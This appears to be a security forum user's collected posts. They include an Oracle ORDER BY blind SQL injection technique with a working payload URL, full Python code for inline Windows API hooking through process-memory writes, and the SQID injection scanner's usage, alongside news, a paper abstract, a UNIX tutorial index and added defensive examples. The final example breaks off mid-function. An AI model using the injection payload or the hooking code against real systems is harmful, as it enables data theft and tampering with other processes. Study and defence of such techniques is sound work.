Everything posted by Nytro
Posts: 18725. Days Won: 706.
-
Exploiting SQL Injection in ORDER BY on Oracle/MySQL
submitted by alla on 10 May, 2011 - 15:10

Consider the following piece of code:

    $sql = "SELECT something FROM some_table WHERE id=? ORDER BY $column_name";

The WHERE clause is parametrized, but the ORDER BY isn't. This happens often enough. Assuming that $column_name comes from user input, this code is vulnerable to SQL injection. The way to exploit such SQL injection on MySQL backend is described by Sumit Siddharth here and by Jacco van Tuijl here. I couldn't find any clues for Oracle though, so now that I have figured it out, here is how.

This is a blind SQL injection technique - we'll have to extract one bit of info per query, using the order in which the data is returned by the application. Let's assume that the vulnerable script is called as vulnerable.php?sortcolumn=id. In this case it returns the following data:

    foo
    bar
    baz

We can try sorting by other columns and see if the data gets returned in a different order. Say, if we try vulnerable.php?sortcolumn=something, we get back:

    bar
    baz
    foo

Now all we need to do is to get the query to sort the data by a different column depending on the value of a given expression. In Oracle the following syntax works:

    ORDER BY (case when ((boolean_expression)) then id else something end)

If boolean_expression is true the result will be sorted by id, otherwise by something. So, the vulnerable script may be called like this:

    vulnerable.php?sortcolumn=(case+when+((ASCII(SUBSTR((select+table_name+from+all_tables+where+rownum%3d1),1))>%3D128))+then+id+else+something+end)

This will extract the most significant bit of the first character of the first row returned by the "select table_name from all_tables" query. Actually fetching significant amounts of data obviously requires automation.

MySQL:
http://www.notsosecure.com/folder2/2008/08/01/injection-in-order-by-clause/
http://2600nl.net/2010/05/29/exploiting-sql-injection-in-order-by-clause-mysql-5/

Source: http://www.gremwell.com/exploiting_sql_injection_in_order_by_on_oracle
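As an added illustration (not part of the original post), here is the same bug and its fix in a self-contained Python 3 script against an in-memory SQLite table: the WHERE clause is bound, the ORDER BY is pasted in, and a CASE expression in the sort column flips the order exactly as described above. The hardened version maps the user-supplied name onto a fixed allow-list of columns, so no user text ever reaches the SQL. The table contents, the `id > ?` filter and the allow-list are constructed for the example.

```python
import sqlite3

# Constructed stand-in for the post's some_table: the same rows the post returns
# (foo, bar, baz when sorted by id; bar, baz, foo when sorted by something).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE some_table (id INTEGER PRIMARY KEY, something TEXT)")
    con.executemany("INSERT INTO some_table VALUES (?, ?)",
                    [(1, "foo"), (2, "bar"), (3, "baz")])
    return con

def sort_vulnerable(con, column_name):
    """The post's pattern: WHERE is bound, ORDER BY is string-concatenated.
    (The filter is 'id > ?' rather than the post's 'id=?' so that several rows
    come back and the sort order is observable.)"""
    sql = "SELECT something FROM some_table WHERE id > ? ORDER BY " + column_name
    return [row[0] for row in con.execute(sql, (0,))]

# Hardened version: the request selects a key, the key selects a fixed identifier,
# and nothing the user typed is ever spliced into the SQL text.
ALLOWED_SORT_COLUMNS = {"id": "id", "something": "something"}

def is_allowed_sort_column(column_name):
    return column_name in ALLOWED_SORT_COLUMNS

def sort_hardened(con, column_name):
    if not is_allowed_sort_column(column_name):
        raise ValueError("unsupported sort column: %r" % column_name)
    sql = ("SELECT something FROM some_table WHERE id > ? ORDER BY "
           + ALLOWED_SORT_COLUMNS[column_name])
    return [row[0] for row in con.execute(sql, (0,))]

if __name__ == "__main__":
    con = make_db()
    # The CASE expression from the post with a constant condition: true sorts by id,
    # false sorts by something, which is the one bit per request the post describes.
    for column in ("id", "something",
                   "(case when ((1=1)) then id else something end)",
                   "(case when ((1=2)) then id else something end)"):
        print("%-50s -> %s" % (column, sort_vulnerable(con, column)))
    try:
        sort_hardened(con, "(case when ((1=1)) then id else something end)")
    except ValueError as exc:
        print("hardened query rejected it:", exc)
```

The allow-list is the fix because ORDER BY takes an identifier, not a value, so a bind parameter cannot carry it; a lookup table keyed by the request value gives the same flexibility without any string from the client entering the statement.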
-
Microsoft confirms purchase of Skype for $8.5 billion
Tom Warren, 2 hours ago

Microsoft announced on Tuesday the acquisition of Skype. The software giant announced the deal on Tuesday, valued at $8.5 billion cash. Both Skype and Microsoft’s board of directors have approved the deal and Microsoft will create a new business division especially for Skype. Skype CEO Tony Bates will assume the title of president of the Microsoft Skype Division, reporting directly to Ballmer.

“Skype is a phenomenal service that is loved by millions of people around the world,” said Microsoft CEO Steve Ballmer. “Together we will create the future of real-time communications so people can easily stay connected to family, friends, clients and colleagues anywhere in the world.”

Microsoft says Skype will support Microsoft devices like Xbox and Kinect, Windows Phone and a wide array of Windows devices, and Microsoft will connect Skype users with Lync, Outlook, Xbox Live and other communities. Microsoft will continue to invest in and support Skype clients on non-Microsoft platforms.

“Tony Bates has a great track record as a leader and will strengthen the Microsoft management team. I’m looking forward to Skype’s talented global workforce bringing its insights, ideas and experience to Microsoft,” Ballmer said.

Skype currently has 170 million connected users and saw over 207 billion minutes of voice and video conversations in 2010 alone. Microsoft’s promise for Windows Phone, Xbox and Kinect Skype integration confirms that the company will look to use Skype broadly across its products. Skype was originally founded in 2003 and acquired by eBay in September 2005. An investment group led by Silver Lake acquired Skype in 2009.

Speaking on behalf of the investor group that sold Skype to Microsoft, Egon Durban, managing director of Silver Lake, said: “We are thrilled with Skype’s transformation during the period of our ownership and grateful for the extraordinary commitment of its management team and employees. We are excited about Skype’s long-term future with Microsoft, as it is poised to become one of the world’s most dynamic and comprehensive communications platforms.”

Source: Microsoft confirms purchase of Skype for $8.5 billion | WinRumors
-
API Hooking in Python
Author: cadaver (cred)

# patcher.py
# handles patching and unpatching of process memory.
# public domain code.

from ctypes import *
from win32api import *
from pytcc import pytcc
from struct import pack, unpack, calcsize
from win32gui import PyGetString, PySetMemory, PySetString
from win32con import MEM_COMMIT, MEM_RESERVE, MEM_RELEASE, PAGE_EXECUTE_READWRITE, PROCESS_ALL_ACCESS
from distorm import Decode

DEBUG = True

def DB (msg):
    global DEBUG
    if DEBUG:
        print (msg)

def OpenProcess (pid=GetCurrentProcessId ()):
    """Opens a process by pid."""
    DB ("[openProcess] pid:%s." % pid)
    phandle = windll.kernel32.OpenProcess (PROCESS_ALL_ACCESS, False, pid)
    assert phandle, "Failed to open process!\n%s" % WinError (GetLastError ()) [1]
    return phandle

def readMemory (phandle, address, size):
    """readMemory (phandle, address, size): reads size bytes from address."""
    cbuffer = c_buffer (size)
    success = windll.kernel32.ReadProcessMemory (phandle, address, cbuffer, size, 0)
    assert success, "Failed to read memory!\n%s" % WinError (GetLastError ()) [1]
    return cbuffer.raw

def writeMemory (phandle, address=None, data=None):
    """Writes data to memory and returns the address. Allocates if no address is given."""
    assert data
    size = len (data) if isinstance (data, str) else sizeof (data)
    cdata = c_buffer (data) if isinstance (data, str) else byref (data)
    if not address:
        address = allocate (size, phandle)
    success = windll.kernel32.WriteProcessMemory (phandle, address, cdata, size, 0)
    assert success, "Failed to write process memory!\n%s" % WinError (GetLastError ()) [1]
    DB ("[write memory] :%s OK." % address)
    return address

def allocate (size, phandle):
    """Allocates size bytes of RWX memory in phandle."""
    address = windll.kernel32.VirtualAllocEx (phandle, 0, size, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE)
    assert address, "Failed to allocate memory!\n%s" % WinError (GetLastError ()) [1]
    DB ("[memory allocation] :%s" % address)
    return address

def releaseMemory (address, size, phandle):
    """Releases memory by address (size must be 0 with MEM_RELEASE)."""
    return windll.kernel32.VirtualFreeEx (phandle, address, size, MEM_RELEASE)

def transport (data, phandle):
    """Copies data into freshly allocated memory of phandle and returns its address."""
    size = len (data)
    memory = allocate (size, phandle)
    writeMemory (phandle, memory, data)
    return memory

def get_patch (destination, params_size=0):
    """Builds the patch bytes:
        mov eax, destination
        call eax
        retn params_size
    """
    if isinstance (destination, (int, long)):
        destination = pack ("i", destination)
    if isinstance (params_size, (int, long)):
        params_size = pack ("h", params_size)
    return '\xb8%s\xff\xd0\xc2%s' % (destination, params_size)

def get_cparams_size (cparams):
    """Sums sizeof () of the given C type names by compiling a tiny function with tcc."""
    if not cparams:
        return 0
    s = ''
    for param in cparams:
        s += "size += sizeof (%s);\n" % param
    c_code = """
    int getsize ()
    {
        int size = 0;
        %s
        return size;
    }""" % s
    ccompiler = pytcc ()
    ccompiler.compile (c_code)
    ccompiler.relocate ()
    getsize = ccompiler.get_function ("getsize")
    size = getsize ()
    # ccompiler.delete ()
    return size

def get_cparams_size_b (cparams):
    """Same as get_cparams_size, for ctypes types instead of C type names."""
    return sum (map (calcsize, [param._type_ for param in cparams]))

def find_good_spot_to_patch (apiaddress, needed_size, maxscan=4000):
    """find_good_spot_to_patch (apiaddress, needed_size, maxscan=4000):
    Searches the instructions inside an API for a good place to patch:
    a run of at least needed_size bytes with no CALL/JMP inside it."""
    if DEBUG == 2:
        bytes = PyGetString (apiaddress, needed_size * 2)
        dprint (apiaddress, bytes)
    aoffset = 0
    found_space = 0
    position = apiaddress
    while found_space < needed_size:
        bytes = PyGetString (position, 24)
        # DB ("found_space: %s. aoffset: %s. apiaddress: %s." % (found_space, aoffset, hex (position)))
        # if does_code_end_function (bytes): raise RuntimeError ("Function end found before enough space was found!")
        offset, size, instruction, hexstr = Decode (position, bytes) [0]
        if "ret" in instruction.lower ():
            raise RuntimeError ("Function end found before enough space was found!")
        if not filter (lambda x: x.lower () in instruction.lower (), ["call", "jmp"]):
            found_space += size
        else:
            found_space = 0
        aoffset += size
        if aoffset >= maxscan:
            raise RuntimeError ("Maxscan exceeded while searching for a good spot to patch!")
        position += size
    return apiaddress + (aoffset - found_space)

class patcher:
    source = None
    destination = None
    jmp_asm = None
    original_bytes = None
    params_size = 0
    pid = None
    phandle = None
    duplicate_api = None
    original_api = None

    def __init__ (self, source=None, destination=None, params_size=0, pid=GetCurrentProcessId ()):
        self.set_pid (pid)
        self.set_source (source)
        self.set_destination (destination)
        self.set_params_size (params_size)

    def set_pid (self, pid):
        self.close ()
        self.phandle = OpenProcess (pid)
        self.pid = pid

    def set_source (self, source):
        self.source = source

    def set_destination (self, destination):
        self.destination = destination

    def set_params_size (self, size):
        self.params_size = size

    def set_source_as_api (self, apiname, dllname="kernel32.dll", free=True):
        """Resolves apiname in dllname and picks the patch location inside it."""
        module = LoadLibrary (dllname)
        procedure = GetProcAddress (module, apiname)
        if free:
            FreeLibrary (module)
        assert procedure
        # windll wants the module name without its extension ("kernel32.dll" -> "kernel32")
        modname = dllname[:-4] if dllname.lower ().endswith (".dll") else dllname
        self.original_api = getattr (getattr (windll, modname), apiname)
        self.source = find_good_spot_to_patch (procedure, len (get_patch (0, self.params_size)))
        if DEBUG:
            DB ("found good spot to patch: %s %s. Offset from original api address: %s." \
                % (self.source, hex (self.source), self.source - procedure))

    def patch (self):
        """Writes the jump stub over the API, keeping the original bytes for unpatch ()."""
        assert all ((self.phandle, self.source, self.destination)), "Patch source or destination not set!"
        assert not self.original_bytes, "Already patched!"
        self.jmp_asm = get_patch (self.destination, self.params_size)
        jmp_asm_size = len (self.jmp_asm)
        self.original_bytes = PyGetString (self.source, jmp_asm_size)
        assert self.original_bytes, "Failed to capture original_bytes."
        writeMemory (phandle=self.phandle, address=self.source, data=self.jmp_asm)
        msg = "[jmp_asm]:%s\n[jmp_asm_size]:%s\n[original_bytes]:%s\n" \
            % (repr (self.jmp_asm), jmp_asm_size, repr (self.original_bytes))
        DB (msg)

    def unpatch (self):
        """Restores the original bytes."""
        if not self.original_bytes:
            raise RuntimeError ("Not patched!")
        assert all ((self.phandle, self.source, self.destination)), "Not initialized!"
        writeMemory (phandle=self.phandle, address=self.source, data=self.original_bytes)
        self.original_bytes = None

    def close (self):
        if self.phandle:
            windll.kernel32.CloseHandle (self.phandle)
            self.phandle = None

    def release (self):
        if self.phandle and self.duplicate_api:
            releaseMemory (self.duplicate_api, 0, self.phandle)

    def call_original_api (self, *args, **kwargs):
        return self.original_api (*args, **kwargs)

    def call_duplicate_api (self, types, *args, **kwargs):
        """types: sequence of ctypes argument types of the API."""
        return WINFUNCTYPE (c_void_p, *types) (self.duplicate_api) (*args, **kwargs)

    def __del__ (self):
        try: self.unpatch ()
        except: pass
        try: self.release ()
        except: pass
        try: self.close ()
        except: pass

def dprint (a, c):
    """Pretty prints disassembled bytes. dprint (offset, bytes)."""
    x = Decode (a, c)
    print "[deci addr : hexi addr] [size] instruction\n"
    for offset, size, instruction, hexstr in x:
        print "[%s : %s] [%s] %s" % (a, hex (a), size, instruction)
        a += size
    print
#cad

# tramper.py
# Relocates bytes of an API and creates a jump from those bytes to the original API, effectively negating a hook.
# TODO !Recalculate Relocated Relative jmp and call addresses.
# public domain code.

from ctypes import *
from win32api import *
from pytcc import pytcc
from struct import pack, unpack
from win32gui import PyGetString, PySetMemory, PySetString
from win32con import MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE, PROCESS_ALL_ACCESS
from distorm import Decode
from patcher import OpenProcess, readMemory, writeMemory, allocate, transport

DEBUG = True

def DB (msg):
    global DEBUG
    if DEBUG:
        print (msg)

def tramper (apiaddress, hook_size, apiname=None, dllname="kernel32"):
    """tramper (apiaddress, hook_size, apiname=None, dllname="kernel32"):
    Creates a duplicate API using the trampoline method and returns its address:
    the first hook_size bytes of the API (rounded up to whole instructions) are
    copied to new memory, followed by a JMP back into the original API right after them.
    """
    if DEBUG:
        global hprocess, landing_offset, instructions, landing_address, tramp_memory, tramp_code, original_bytes
    if not apiaddress:
        dll = LoadLibrary (dllname)
        apiaddress = GetProcAddress (dll, apiname)
    landing_offset = 0
    hprocess = OpenProcess ()
    original_bytes = PyGetString (apiaddress, 300)
    tramp_memory = allocate (len (original_bytes) + 50, hprocess)
    print "Tramp memory: %s %s." % (tramp_memory, hex (tramp_memory))
    instructions = Decode (apiaddress, original_bytes)
    sizes = iter ([X[1] for X in instructions])
    # advance by whole instructions until the hook is covered
    while landing_offset < hook_size:
        landing_offset += sizes.next ()
    landing_address = apiaddress + landing_offset
    DB ("Landing offset : %s %s" % (landing_offset, hex (landing_offset)))
    DB ("Landing address: %s %s" % (landing_address, hex (landing_address)))
    distance = landing_address - (tramp_memory + landing_offset)
    DB ("Distance: %s %s." % (distance, hex (distance)))
    tramp_code = original_bytes [:landing_offset]  # api start - past hook - to start of instruction
    instructions = Decode (apiaddress, tramp_code)
    boffset = 0
    for offset, size, instruction, hexstr in instructions:
        if filter (lambda x: x.lower () in instruction.lower (), ["call", "jmp"]):
            raise RuntimeError ("[not supported yet] Cannot relocate CALL/JMP Instructions. Address: %s" % (apiaddress + boffset))
        boffset += size
    # TODO !Recalculate Relocated Relative jmp and call addresses.
    jump_code = '\xe9' + pack ("i", distance - 5)  # bytes = jmp (distance - size of jump)
    tramp_code += jump_code
    DB ("Tramp [size]: %s [bytes]; %s" % (len (tramp_code), repr (tramp_code)))
    DB ("Tramper api decode.")
    if DEBUG:
        dprint (apiaddress, tramp_code)
    writeMemory (hprocess, tramp_memory, tramp_code)
    CloseHandle (hprocess)
    return tramp_memory

def dprint (a, c):
    """Pretty prints disassembled bytes. dprint (offset, bytes)."""
    x = Decode (a, c)
    print "[deci addr : hexi addr] [size] instruction\n"
    for offset, size, instruction, hexstr in x:
        print "[%s : %s] [%s] %s" % (a, hex (a), size, instruction)
        a += size

if __name__ == "__main__":
    # Test.
    lib = LoadLibrary ("kernel32")
    OpenProcessAddr = GetProcAddress (lib, "OpenProcess")
    FreeLibrary (lib)
    trampAddr = tramper (
        apiaddress=OpenProcessAddr,   # (optional if apiname is defined) API address to duplicate.
        hook_size=10,                 # size of our API jmp code. (minimum size of relocated API bytes)
        apiname=None,                 # (optional)
        dllname="kernel32")           # (optional / defaults to kernel32)
    # Prototype the OpenProcess trampoline.
    duplicate_OpenProcess = WINFUNCTYPE (c_int, c_int, c_int, c_int) (trampAddr)
    pid = GetCurrentProcessId ()
    print "Calling duplicate OpenProcess with pid: %s" % pid
    phandle = duplicate_OpenProcess (0x1f0fff, 0, pid)
    print "Return value: %s." % phandle
    if phandle:
        CloseHandle (phandle)
#cad

# hooker.py
# deals with hooking of win32 APIs.
# public domain code.

from patcher import *
from tramper import tramper
from win32api import *
from pytcc import pytcc

def create_hook (duplicate_api, cparam_types='', prelogic="", postlogic="", restype="int"):
    """create_hook (duplicate_api, cparam_types='', prelogic="", postlogic="", restype="int"):
    Compiles a C hook function with tcc. Its parameters are named A, B, C... after
    cparam_types; DUPE is the trampoline to the real API and RET its return value."""
    c_code = """
    %s function (int caller, %s)
    {
        %s
        %s RET = DUPE ( %s );
        %s
        return RET;
    }"""
    cargs = ''
    symbols = ''
    for arg, char in zip (cparam_types, "ABCDEFGHIJKLMNOPQRSTUVWXYZ"):
        symbols += "%s, " % char
        cargs += "%s %s, " % (arg, char)
    symbols = symbols [:-2]
    cargs = cargs [:-2]
    c_code = c_code % (restype, cargs, prelogic, restype, symbols, postlogic)
    ccompiler = pytcc ()
    ccompiler.add_lib_proc ("msvcrt.dll", "memset")
    ccompiler.add_symbol ("DUPE", duplicate_api)
    ccompiler.compile (c_code)
    ccompiler.relocate ()
    hook = ccompiler.get_symbol ("function")
    return (c_code, hook)

def hooker (apiname, cparam_types=list (), restype="int", prelogic='', postlogic='',
            pid=GetCurrentProcessId (), dllname="kernel32"):
    """hooker (apiname, cparam_types=list (), restype="int", prelogic='', postlogic='',
               pid=GetCurrentProcessId (), dllname="kernel32"):
    Builds a trampoline, compiles the hook and returns a ready (not yet patched) patcher."""
    pat = patcher ()
    params_size = get_cparams_size (cparam_types)
    pat.set_params_size (params_size)
    pat.set_source_as_api (apiname, dllname)
    # the destination is not known yet; only the stub length matters here
    hook_size = len (get_patch (0, pat.params_size))
    tramp = tramper (pat.source, hook_size)
    pat.duplicate_api = tramp
    hook_ccode, hooks = create_hook (tramp, cparam_types, prelogic, postlogic, restype)
    pat.c_code = hook_ccode
    pat.set_destination (hooks)
    return pat

if __name__ == '__main__':
    # Test.
    hook = hooker (
        # API to hook
        apiname="OpenProcess",
        # the DLL the API is in. (defaults to kernel32)
        dllname="kernel32",
        # (required) API parameter types. In our hook these get translated to the names A,B,C... respectively.
        cparam_types=["int", "int", "int"],
        # (required) the API return type.
        restype="int",
        # (optional) this is the code in our hook which is executed Before the real API.
        prelogic="if (C==1) {return 1111;}",
        # (optional) this is the code in our hook which is executed After the real API. The real API's return value is named RET.
        postlogic="if (RET) {return 0;}")
    # hook API.
    # hook automatically unhooks itself and cleans up when it isn't referred to anymore.
    hook.patch ()
    print "Calling hooked OpenProcess api with process id as 1."
    ret = windll.kernel32.OpenProcess (0x1f0fff, 0, 1)
    print "Return value: %s" % ret
    if ret == 1111:
        print "This test was successful."
    else:
        print "Return value is unexpected."
    # unhook API.
    # hook.unpatch ()
#cad

Download: http://www.rohitab.com/discuss/index.php?app=core&module=attach&section=attach&attach_id=3110
Source: API Hooking in Python - rohitab.com - Forums
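The stub that patcher.get_patch writes (mov eax, imm32 / call eax / ret imm16) and the E9 rel32 tail jump that tramper builds are also exactly what an integrity check looks for when it wants to know whether an exported function has been inline-hooked. The following Python 3 example is added here and is not part of cadaver's code: it encodes both instruction sequences with struct, decodes them back from a function's first bytes, and compares a live prologue with the on-disk copy. The API address, the on-disk prologue bytes and the hook target are constructed placeholders; in a real check the live bytes would come from ReadProcessMemory and the reference bytes from the relocated module image.

```python
import struct

def build_call_stub(destination, params_size=0):
    """Encode the 10-byte stub patcher.get_patch writes over the API:
    mov eax, imm32 ; call eax ; ret imm16."""
    return (b"\xb8" + struct.pack("<I", destination & 0xFFFFFFFF)
            + b"\xff\xd0"
            + b"\xc2" + struct.pack("<H", params_size))

def build_jmp_rel32(source, target):
    """Encode the trampoline's tail jump (E9 rel32) to be placed at `source`.
    rel32 counts from the end of the 5-byte instruction, which is why tramper.py
    packs (distance - 5)."""
    return b"\xe9" + struct.pack("<i", target - (source + 5))

def classify_prologue(address, prologue):
    """Look at the first bytes of a function mapped at `address` and describe a
    recognised inline hook, or return None when neither stub shape is present."""
    if (len(prologue) >= 10 and prologue[0] == 0xB8
            and prologue[5:7] == b"\xff\xd0" and prologue[7] == 0xC2):
        target = struct.unpack_from("<I", prologue, 1)[0]
        params_size = struct.unpack_from("<H", prologue, 8)[0]
        return {"kind": "call-stub", "target": target, "params_size": params_size}
    if len(prologue) >= 5 and prologue[0] == 0xE9:
        rel = struct.unpack_from("<i", prologue, 1)[0]
        return {"kind": "jmp-rel32", "target": (address + 5 + rel) & 0xFFFFFFFF}
    return None

def check_function_integrity(address, live_bytes, image_bytes):
    """Compare a function's in-memory prologue with the same bytes from the module
    on disk (after relocations). Identical bytes: no inline hook. Otherwise say
    what the modification looks like."""
    if live_bytes == image_bytes:
        return None
    return classify_prologue(address, live_bytes) or {"kind": "unknown-modification", "target": None}

# Constructed sample. API_ADDRESS is a placeholder, not a real export address; the
# on-disk prologue is the familiar "mov edi,edi / push ebp / mov ebp,esp / sub esp,0x10 /
# push ebx / push esi / push edi" sequence; the live copy has the call stub written over it.
API_ADDRESS = 0x7C80AC00
ON_DISK_PROLOGUE = bytes.fromhex("8bff558bec83ec10535657")
HOOK_TARGET = 0x00410000          # placeholder for the hook function's address
LIVE_PROLOGUE = build_call_stub(HOOK_TARGET, 12) + ON_DISK_PROLOGUE[10:]

if __name__ == "__main__":
    print("clean :", check_function_integrity(API_ADDRESS, ON_DISK_PROLOGUE, ON_DISK_PROLOGUE))
    print("hooked:", check_function_integrity(API_ADDRESS, LIVE_PROLOGUE, ON_DISK_PROLOGUE))
    tramp_jump = build_jmp_rel32(0x00200000, API_ADDRESS + 10)
    print("trampoline tail:", tramp_jump.hex(), classify_prologue(0x00200000, tramp_jump))
```

The params_size decoded from the stub (12 for a three-argument stdcall API such as OpenProcess) is a useful sanity check in its own right: a stub whose ret imm16 does not match the export's calling convention will corrupt the caller's stack, which is one way such hooks show up as crashes before anyone looks at the bytes.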
-
No, it contained SQLite, so 99% it was a stealer, one that among other things also targeted Firefox. I didn't bother analysing the file; I saw that and banned him.
-
Address Space Randomization for Mobile Devices
Hristo Bojinov (Stanford University), Dan Boneh (Stanford University), Rich Cannings (Google, Inc.), Iliyan Malchev (Google, Inc.)

ABSTRACT
Address Space Layout Randomization (ASLR) is a defensive technique supported by many desktop and server operating systems. While smartphone vendors wish to make it available on their platforms, there are technical challenges in implementing ASLR on these devices. Pre-linking, limited processing power and restrictive update processes make it difficult to use existing ASLR implementation strategies even on the latest generation of smartphones. In this paper we introduce retouching, a mechanism for executable ASLR that requires no kernel modifications and is suitable for mobile devices. We have implemented ASLR for the Android operating system and evaluated its effectiveness and performance. In addition, we introduce crash stack analysis, a technique that uses crash reports locally on the device, or in aggregate in the cloud, to reliably detect attempts to brute-force ASLR protection. We expect that retouching and crash stack analysis will become standard techniques in mobile ASLR implementations.

Download: http://bojinov.org/professional/wisec2011-mobileaslr-paper.pdf
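The abstract only names crash stack analysis; the paper's actual criteria are not on this page. As an added example (mine, not the authors'), the following Python 3 function applies one plausible heuristic to constructed crash records: a package that faults repeatedly within a short window, each time at a different address, looks like someone probing a randomized layout, whereas a deterministic bug faults at the same address every time. The record layout, the window and the threshold are assumptions; grouping by package across device ids is the "in aggregate in the cloud" reading of the abstract.

```python
from collections import defaultdict

# Constructed crash records in the shape a crash reporter might upload:
# (unix time, device id, package, signal, faulting program counter). Not from the paper.
SAMPLE_CRASHES = [
    (1000, "dev-a", "com.example.viewer", "SIGSEGV", 0x4007A1C0),
    (1003, "dev-a", "com.example.viewer", "SIGSEGV", 0x400D31C0),
    (1006, "dev-b", "com.example.viewer", "SIGSEGV", 0x4012F1C0),
    (1009, "dev-a", "com.example.viewer", "SIGSEGV", 0x401871C0),
    (1012, "dev-b", "com.example.viewer", "SIGSEGV", 0x401DF1C0),
    (1500, "dev-c", "com.example.mail",   "SIGSEGV", 0x40055D3C),  # ordinary crash
    (1600, "dev-c", "com.example.mail",   "SIGSEGV", 0x40055D3C),  # same PC again: a plain bug
    (1700, "dev-c", "com.example.mail",   "SIGSEGV", 0x40055D3C),
    (1800, "dev-c", "com.example.mail",   "SIGSEGV", 0x40055D3C),
]

FATAL_SIGNALS = ("SIGSEGV", "SIGBUS", "SIGILL")

def suspicious_packages(crashes, window_seconds=60, min_crashes=4):
    """Flag packages whose crashes cluster in time *and* land on a different faulting
    address each time. Illustrative heuristic (an assumption, not the paper's rule):
    a deterministic bug keeps faulting at one address; guessing a randomized layout
    faults somewhere new on each attempt. Returns {package: (crashes, seconds spanned)}."""
    by_package = defaultdict(list)
    for ts, device, package, signal, pc in sorted(crashes):
        if signal in FATAL_SIGNALS:
            by_package[package].append((ts, pc))
    flagged = {}
    for package, events in by_package.items():
        start = 0
        for end in range(len(events)):
            # slide the window so it spans at most window_seconds
            while events[end][0] - events[start][0] > window_seconds:
                start += 1
            window = events[start:end + 1]
            distinct = len({pc for _, pc in window})
            if len(window) >= min_crashes and distinct == len(window):
                flagged[package] = (len(window), events[end][0] - events[start][0])
    return flagged

if __name__ == "__main__":
    for package, (count, span) in suspicious_packages(SAMPLE_CRASHES).items():
        print("%s: %d crashes at distinct addresses within %d s" % (package, count, span))
```

On a single device the same function runs over the local crash log with a lower threshold; in the cloud the package-level grouping is what makes a slow, distributed probe visible that no single handset would flag.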
-
UNIX Tutorial for Beginners

These tutorials are derived from the excellent tutorials from the University of Surrey, UK, with some minor modifications for our site. The originals can be found here.

Typographical Conventions
Introduction to The UNIX operating system

Tutorial One: Listing files and directories; Making Directories; Changing to a different Directory; The directories . and ..; Pathnames; More about home directories and pathnames
Tutorial Two: Copying Files; Moving Files; Removing Files and directories; Displaying the contents of a file on the screen; Searching the contents of a file
Tutorial Three: Redirection; Redirecting the Output; Redirecting the Input; Pipes
Tutorial Four: Wildcards; Filename Conventions; Getting Help
Tutorial Five: File system security (access rights); Changing access rights; Processes and Jobs; Listing suspended and background processes; Killing a process
Tutorial Six: Other Useful UNIX commands
Tutorial Seven: Compiling UNIX software packages; Download source code; Extracting source code; Configuring and creating the Makefile; Building the package; Running the software; Stripping unnecessary code
Tutorial Eight: UNIX variables; Environment variables; Shell variables; Using and setting variables

UNIX Frequently Asked Questions (FAQs): These seven articles contain the answers to some Frequently Asked Questions often seen in comp.unix.questions and comp.unix.shell.
History of UNIX: UNIX was originally developed at Bell Laboratories as a private research project by a small group of people. Read all about the history of its creation.

This tutorial is licensed under a Creative Commons License. The original version was prepared and is copyrighted by Michael Stonebank of the University of Surrey, UK.
Online: http://manuals.itc.virginia.edu/unixtut/index.html
-
SQID SQL Injection Digger

About
SQL injection digger is a command line program that looks for SQL injections and common errors in web sites. Current version can perform the following operations:
- Look for SQL injections and common errors in web site URLs found by performing a google search.
- Look for SQL injections and common errors in a given URL or a file with URLs.
- Look for SQL injections and common errors in links from a web page.
- Crawl a web site/web page and do the above.
Also supports:
- Load multiple triggers from file.
- Load multiple signature databases from files.
- HTTPS support.
- HTTP proxy support with authentication.
- Basic authentication.
- Specify user agent.
- Specify referer.
- HTTP Cookies loading from command line or a file.
sqid is written in ruby. Find out more about SQL Injection. sqid is extensible by adding more signatures to its database (sqid.db). The signatures simply use regular expressions.

Usage
Usage: sqid.rb [options]
options:
    -m, --mode MODE                 Operate in mode MODE. MODE is one of
                                        g,google   Operate in google search mode.
                                        u,url      Check this url or a file with urls.
                                        p,page     Check single page.
                                        c,crawl    Crawl website and check.
Google search mode options:
    -q, --query QUERY               QUERY to perforn google search for.
    -s, --start START               zero-based index of the first desired result, zero if not specified.
    -r, --results RESULTS           number of results desired, default is 20 if not specfied. rounded to tens.
URL check mode options:
    -u, --url URL                   check this URL. If URL is a file urls will be loaded from this file, specify each url on a new line.
Page check mode options:
    -p, --page PAGE                 Check this page.
Crawl mode options:
    -c, --crawl WEBSITE             Crawl website WEBSITE and check. specfify as http[s]://WESITE:[PORT], default PORT is 80
URL, Page and Crawl mode common options:
    -C, --cookie COOKIE             Cookie in the HTTP header specify as name=value,name=value. If COOKIE is a file cookies will be loaded from this file, specify each cookie on a new line.
    -a, --accept-cookies            Accept cookies from the webite or page. Default is no.
    -R, --referer REFERER           Set referer in the HTTP header.
    -B, --auth CREDENTIALS          Use crendtials as basic auth for the website. specfify as user:password.
Common options:
    -o, --with-noquery              Match page content without query parameters. Default is false.
    -D, --db-files FILE,...,FILE    Use file(s) FILE,...,FILE as signature database.
    -t, --trigger TRIGGER           Use TRIGGER for detecting SQL injections/errors default is '. If TRIGGER is a file triggers will be loaded from it. specify each trigger on newline. Lines starting with a # are ignored.
    -T, --time-out TIMEOUT          Timeout for response in seconds. Default is 10 seconds.
    -U, --user-agent USERAGENT      User Agent in the HTTP Header.
    -P, --proxy PROXY               User HTTP proxy PROXY for operations. specfify as proxy:port.
    -A, --proxy-auth CREDENTIALS    Use crendtials CRENDENTIALS for the proxy. specfify as user:password.
    -v, --verbose                   Run verbosely.
    -h, --help                      Show this message

Download: http://rubyforge.org/frs/?group_id=2617
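sqid's two building blocks, appending a trigger to each query parameter and matching the response against a regular-expression signature database, are easy to reproduce. The following Python 3 example is added here and is not sqid's code: it parses a small constructed signature file (the real sqid.db layout is not shown on this page, so the dbms/regex line format is an assumption), derives one probe URL per parameter with the default ' trigger, and reports which DBMS error signatures appear in a response body. Run against an application's own responses in a test environment, the same matcher shows which pages leak database errors and should be fixed to return a generic error page.

```python
import re
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

# Constructed signature file. sqid.db's own layout is not shown on this page; the
# "dbms<whitespace>regex" line format used here is an assumption for the example.
SIGNATURE_DB = r"""
# dbms    regular expression matched against the response body
mysql     You have an error in your SQL syntax
mysql     Warning: mysql_fetch_array\(\)
oracle    ORA-\d{5}
mssql     Unclosed quotation mark after the character string
pgsql     pg_query\(\).*ERROR
"""

def load_signatures(text):
    """Parse signature lines into (dbms, compiled regex); blank and '#' lines are skipped."""
    signatures = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        dbms, pattern = line.split(None, 1)
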